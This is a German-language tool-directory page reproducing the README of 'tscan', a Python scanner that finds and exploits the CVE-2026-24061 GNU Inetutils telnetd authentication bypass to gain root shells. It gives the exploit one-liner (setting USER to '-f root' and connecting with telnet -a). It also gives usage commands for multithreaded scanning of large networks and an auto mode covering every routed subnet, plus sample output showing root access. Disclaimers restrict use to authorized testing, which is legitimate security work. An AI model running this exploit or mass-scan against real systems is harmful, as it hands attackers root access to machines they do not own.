Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
tscan — Python-basierter Scanner, der die CVE-2026-24061 telnetd-Authentifizierungsumgehung erkennt und ausnutzt und so Root-Shell-Zugriff auf verwundbare GNU-Inetutils-Dienste ermöglicht. | Kitploit
Tools/GitHubGitHub/cumakurt/tscan
AufklärungSchwachstellenscannerPort-ScanningExploitationNetzwerksicherheitPenetrationstestsLernen & Bildung
GitHubcumakurt/tscan

tscan

Python-basierter Scanner, der die CVE-2026-24061 telnetd-Authentifizierungsumgehung erkennt und ausnutzt und so Root-Shell-Zugriff auf verwundbare GNU-Inetutils-Dienste ermöglicht.

Repository anzeigen
1vor 7 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Telnetd Auth Bypass Scanner (CVE-2026-24061)

Ein Python-basierter Scanner zur Erkennung und Ausnutzung der Schwachstelle CVE-2026-24061 in GNU-Inetutils-telnetd-Diensten. Dieses Tool scannt IP-Adressen oder Netzwerke nach verwundbaren telnetd-Diensten, die eine Authentifizierungsumgehung ermöglichen, die zu Root-Shell-Zugriff führt.


⚠️ WICHTIGER RECHTLICHER HINWEIS UND HAFTUNGSAUSSCHLUSS

DIESE SOFTWARE WIRD AUSSCHLIESSLICH FÜR BILDUNGSZWECKE UND AUTORISIERTE SICHERHEITSTESTS BEREITGESTELLT.

1. Bildungszweck

Diese Anwendung wurde ausschließlich zu Bildungszwecken entwickelt, um Sicherheitslücken zu demonstrieren und bei autorisierten Sicherheitstests und Forschungsarbeiten zu helfen.

2. Keine Gewährleistung

DIESE SOFTWARE WIRD "WIE BESEHEN" OHNE JEGLICHE GEWÄHRLEISTUNG, AUSDRÜCKLICH ODER STILLSCHWEIGEND, BEREITGESTELLT, EINSCHLIESSLICH, ABER NICHT BESCHRÄNKT AUF DIE GEWÄHRLEISTUNG DER MARKTGÄNGIGKEIT, DER EIGNUNG FÜR EINEN BESTIMMTEN ZWECK UND DER NICHTVERLETZUNG VON RECHTEN DRITTER. DIE AUTOREN UND MITWIRKENDEN GARANTIEREN NICHT, DASS DIE SOFTWARE FEHLERFREI, SICHER ODER FUNKTIONSFÄHIG IST. Die Software kann Fehler, Bugs oder andere Defekte enthalten.

3. Verantwortung des Benutzers

DIE GESAMTE VERANTWORTUNG UND HAFTUNG FÜR DIE NUTZUNG DIESER SOFTWARE LIEGT VOLLSTÄNDIG BEIM BENUTZER. Die Autoren, Mitwirkenden und Vertreiber dieser Software haften nicht für Schäden, Verluste oder rechtliche Konsequenzen, die aus der Nutzung, dem Missbrauch oder der Unfähigkeit zur Nutzung dieser Software entstehen.

4. Unbefugte Nutzung untersagt

Dieses Tool darf NUR auf Systemen verwendet werden, die Ihnen gehören oder für die Sie eine ausdrückliche schriftliche Genehmigung zum Testen haben. Unbefugter Zugriff auf Computersysteme ist illegal und kann zu strafrechtlicher Verfolgung führen.

5. Keine Garantien

Die Autoren garantieren NICHT:

  • Die Genauigkeit der Scan-Ergebnisse
  • Die Sicherheit der Anwendung selbst
  • Die Kompatibilität mit allen Systemen
  • Das Fehlen von Bugs oder Fehlern
  • Eine bestimmte Funktionalität oder Leistung

Durch die Nutzung dieser Software bestätigen Sie, dass Sie diese Bedingungen gelesen, verstanden haben und ihnen zustimmen. Wenn Sie nicht zustimmen, verwenden Sie diese Software nicht.


Entwickler

Entwickelt von: Cuma KURT
E-Mail: [email protected]
LinkedIn: https://www.linkedin.com/in/cuma-kurt-34414917/

Informationen zur Schwachstelle

CVE-2026-24061: GNU-Inetutils-telnetd bis einschließlich Version 2.7 ermöglicht eine Remote-Authentifizierungsumgehung über einen -f root-Wert für die Umgebungsvariable USER.

CVSS-Score: 9.8 (Kritisch)

Referenz: NVD CVE-2026-24061

Funktionen

  • 🔍 Port-Scanning: Erkennt offene Telnet-Ports (Standard: 23, anpassbar)
  • 🎯 Schwachstellenerkennung: Testet auf Ausnutzbarkeit von CVE-2026-24061
  • ⚡ Multithreading: Schnelles paralleles Scannen mit konfigurierbarer Thread-Anzahl
  • 📁 Flexible Eingabe: Unterstützt IP-Adressen, CIDR-Netzwerke und dateibasierte Ziellisten
  • 🗺️ Automatische Erkennung: Automatische Erkennung und Scan von Subnetzen aus der Routing-Tabelle
  • 🛑 Sicherer Abbruch: Strg+C stoppt den Scan sicher und zeigt Teilergebnisse an
  • 📊 Echtzeit-Fortschritt: Fortschrittsbalken mit Statistiken und Ergebnissen

Installation

Voraussetzungen

  • Python 3.6 oder höher
  • telnet-Client (normalerweise vorinstalliert auf Linux/macOS)

Abhängigkeiten installieren

root@kitploit:~
pip3 install -r requirements.txt

Hinweis: Die meisten Abhängigkeiten sind Teil der Python-Standardbibliothek. Das Tool funktioniert sofort mit Python 3.6+.

Verwendung

Grundlegende Verwendung

root@kitploit:~
# Einzelne IP-Adresse scannen
python3 tscan.py 192.168.1.1

# CIDR-Netzwerk scannen
python3 tscan.py 192.168.1.0/24

# Mit benutzerdefiniertem Port scannen
python3 tscan.py -p 2323 192.168.1.1

# Ziele aus einer Datei scannen
python3 tscan.py targets.txt

# Mehrere IP-Adressen scannen
python3 tscan.py 192.168.1.1 10.0.0.1 172.16.0.1

# Mehrere CIDR-Netzwerke scannen
python3 tscan.py 192.168.1.0/24 10.0.0.0/16

Leistungsoptimierung

root@kitploit:~
# Thread-Anzahl für schnelleres Scannen erhöhen (100 Threads)
python3 tscan.py -t 100 192.168.1.0/24

# Timeout für langsame Netzwerke erhöhen
python3 tscan.py --timeout 10 192.168.1.0/24

# Beides für große Netzwerk-Scans kombinieren
python3 tscan.py -t 200 --timeout 8 10.0.0.0/16

Automatischer Erkennungsmodus

root@kitploit:~
# Alle Subnetze aus der System-Routing-Tabelle automatisch erkennen und scannen
python3 tscan.py --auto
# oder Kurzform:
python3 tscan.py -a

# Automatische Erkennung mit benutzerdefiniertem Port
python3 tscan.py --auto -p 2323
# oder:
python3 tscan.py -a -p 2323

# Automatische Erkennung mit hoher Thread-Anzahl
python3 tscan.py --auto -t 200
# oder:
python3 tscan.py -a -t 200

Hinweis: Der --auto-Modus liest die System-Routing-Tabelle mit dem Befehl ip route list oder route -n und scannt automatisch alle erkannten Subnetze.

Praxisbeispiele

root@kitploit:~
# Beispiel 1: Schneller Scan des lokalen Netzwerks
python3 tscan.py 192.168.1.0/24

# Beispiel 2: Schneller Scan mit hoher Parallelität
python3 tscan.py -t 300 --timeout 3 10.0.0.0/16

# Beispiel 3: Nicht standardmäßigen Telnet-Port scannen
python3 tscan.py -p 2323 192.168.1.0/24

# Beispiel 4: Alle lokalen Netzwerk-Subnetze automatisch erkennen und scannen
python3 tscan.py --auto
# oder:
python3 tscan.py -a

# Beispiel 5: Automatische Erkennung mit benutzerdefinierten Einstellungen
python3 tscan.py --auto -p 2323 -t 100 --timeout 8
# oder:
python3 tscan.py -a -p 2323 -t 100 --timeout 8

Befehlszeilenoptionen

root@kitploit:~
positional arguments:
  targets               IP-Adresse(n), CIDR-Netzwerk(e) oder Dateipfad(e) mit Zielen

options:
  -h, --help            Diese Hilfemeldung anzeigen und beenden
  -p, --port PORT       Zu scannender Telnet-Port (Standard: 23)
  -t, --threads THREADS Anzahl der gleichzeitigen Threads (Standard: 50)
  --timeout TIMEOUT     Verbindungs-Timeout in Sekunden (Standard: 5)
  -v, --verbose         Ausführliche Ausgabe
  -a, --auto            Alle Subnetze aus der System-Routing-Tabelle automatisch erkennen und scannen (route -n oder ip route list)

Format der Eingabedatei

Erstellen Sie eine Textdatei mit einem Ziel pro Zeile:

root@kitploit:~
192.168.1.1
192.168.1.0/24
10.0.0.1
172.16.0.0/16

Zeilen, die mit # beginnen, werden als Kommentare behandelt und ignoriert.

Ausgabe

Das Tool bietet:

  1. Echtzeit-Fortschritt: Zeigt Ergebnisse, sobald sie entdeckt werden

    • Fortschrittsbalken mit Prozentsatz und Statistiken
    • Anzahl verwundbarer Hosts im Fortschrittsbalken angezeigt
    • [!] - Verwundbarer Host
    • [~] - Port offen, aber nicht verwundbar
    • Ziele mit geschlossenem Port werden stillschweigend übersprungen
    • Strg+C (KeyboardInterrupt): Unterbricht den Scan sicher und zeigt sofort Teilergebnisse an
  2. Zusammenfassungsbericht: Enthält:

    • Gesamtzahl gefundener Telnet-Dienste
    • Anzahl verwundbarer Hosts
    • Detaillierte Liste verwundbarer Hosts

Beispielausgabe

Grundlegende Scan-Ausgabe

root@kitploit:~
[*] Starte Scan von 256 Ziel(en)...
[*] Port: 23, Threads: 50, Timeout: 5s

[*] Fortschritt: [████████████████░░░░░░░░░░░░░░░░░░░░] 40.0% (102/256) | Offen: 2 | Verwundbar: 1
[!] 192.168.1.100:23 - VERWUNDBAR
[*] Fortschritt: [████████████████████████████████████] 100.0% (256/256) | Offen: 3 | Verwundbar: 1
[+] Scan abgeschlossen: 256/256 Ziele gescannt

======================================================================
Zusammenfassung der Scan-Ergebnisse
======================================================================

Telnet-Dienste gefunden: 3
Verwundbare Hosts: 1

[!] VERWUNDBARE HOSTS:

  ● 192.168.1.100:23
    Ausgabe: uid=0(root) gid=0(root) groups=0(root)...

[~] Telnet-Dienste gefunden, aber nicht verwundbar:

  ● 192.168.1.101:23
  ● 192.168.1.102:23

[*] Scan in 12.34 Sekunden abgeschlossen

So funktioniert es

  1. Port-Erkennung: Prüft, ob der Telnet-Port auf den Ziel-IPs offen ist
  2. Exploit-Versuch: Versucht bei offenen Ports den Exploit für CVE-2026-24061:
    • Setzt die Umgebungsvariable USER="-f root"
    • Verbindet über den Befehl telnet -a
    • Sendet Testbefehle, um den Root-Shell-Zugriff zu verifizieren
  3. Ergebnisklassifizierung: Kategorisiert Ergebnisse als verwundbar oder nicht verwundbar

Exploit-Details

Die Schwachstelle ermöglicht eine Authentifizierungsumgehung, indem die Umgebungsvariable USER auf -f root gesetzt wird:

root@kitploit:~
USER="-f root" telnet -a TARGET_IP [PORT]

Dies führt dazu, dass telnetd die USER-Variable als Flag interpretiert, die Authentifizierung umgeht und Root-Zugriff gewährt.

Einschränkungen

  • Erfordert einen installierten telnet-Client
  • Funktioniert nur gegen verwundbare telnetd-Versionen (≤ 2.7)
  • Der automatische Erkennungsmodus erfordert den Befehl ip route list oder route -n

Fehlerbehebung

"telnet-Befehl nicht gefunden"

Telnet-Client installieren:

root@kitploit:~
# Debian/Ubuntu
sudo apt-get install telnet

# CentOS/RHEL
sudo yum install telnet

# macOS
# Normalerweise vorinstalliert

Keine Ergebnisse gefunden

  • Überprüfen Sie, ob die Ziele erreichbar sind
  • Firewall-Regeln prüfen
  • Sicherstellen, dass Telnet-Dienste tatsächlich ausgeführt werden
  • Timeout erhöhen: --timeout 10

Rechtmäßige und ethische Nutzung

Dieses Tool ist bestimmt für:

  • ✅ Autorisierte Penetrationstests
  • ✅ Sicherheitsforschung an eigenen Systemen
  • ✅ Schwachstellenbewertung mit entsprechender Genehmigung
  • ✅ Bildungszwecke in kontrollierten Umgebungen

Verwenden Sie dieses Tool NICHT für:

  • ❌ Unbefugten Zugriff auf Systeme
  • ❌ Illegale Hacking-Aktivitäten
  • ❌ Aktivitäten ohne ausdrückliche Genehmigung

Referenzen

  • CVE-2026-24061 Details
  • SafeBreach Labs Analyse

Lizenz

Dieses Programm ist freie Software: Sie können es unter den Bedingungen der GNU General Public License, wie von der Free Software Foundation veröffentlicht, entweder Version 3 der Lizenz oder (nach Ihrer Wahl) jeder späteren Version, weiterverbreiten und/oder modifizieren.

Dieses Programm wird in der Hoffnung verbreitet, dass es nützlich sein wird, aber OHNE JEGLICHE GEWÄHRLEISTUNG; ohne die stillschweigende Gewährleistung der MARKTGÄNGIGKEIT oder EIGNUNG FÜR EINEN BESTIMMTEN ZWECK. Weitere Details finden Sie in der GNU General Public License.

Sie sollten eine Kopie der GNU General Public License zusammen mit diesem Programm erhalten haben. Falls nicht, siehe https://www.gnu.org/licenses/.

Vollständiger Lizenztext

Siehe LICENSE-Datei für den vollständigen Text der GNU General Public License v3.0.

Haftungsausschluss

DIE AUTOREN UND MITWIRKENDEN SIND NICHT VERANTWORTLICH FÜR MISSBRAUCH ODER SCHÄDEN, DIE DURCH DIESES TOOL VERURSACHT WERDEN.

Dieses Tool wird AUSSCHLIESSLICH FÜR BILDUNGSZWECKE UND AUTORISIERTE SICHERHEITSTESTS BEREITGESTELLT.

NUTZUNG AUF EIGENES RISIKO. Die gesamte Verantwortung und Haftung für die Nutzung dieser Software liegt vollständig beim Benutzer. Die Autoren garantieren nicht die Genauigkeit, Sicherheit oder Funktionalität dieser Software. Die Software wird "WIE BESEHEN" ohne jegliche Gewährleistung bereitgestellt.

Diese Anwendung wurde ausschließlich zu Bildungszwecken entwickelt. Durch die Nutzung dieser Software bestätigen Sie, dass:

  • Sie verstehen, dass es sich um ein Bildungswerkzeug handelt
  • Die gesamte Verantwortung für seine Nutzung bei Ihnen liegt
  • Die Autoren keine Garantien oder Gewährleistungen bieten
  • Sie es nur auf Systemen verwenden, die Ihnen gehören oder für die Sie eine ausdrückliche schriftliche Genehmigung zum Testen haben
  • Unbefugte Nutzung illegal ist und zu strafrechtlicher Verfolgung führen kann

Wenn Sie diesen Bedingungen nicht zustimmen, VERWENDEN SIE DIESE SOFTWARE NICHT.

Tool herunterladen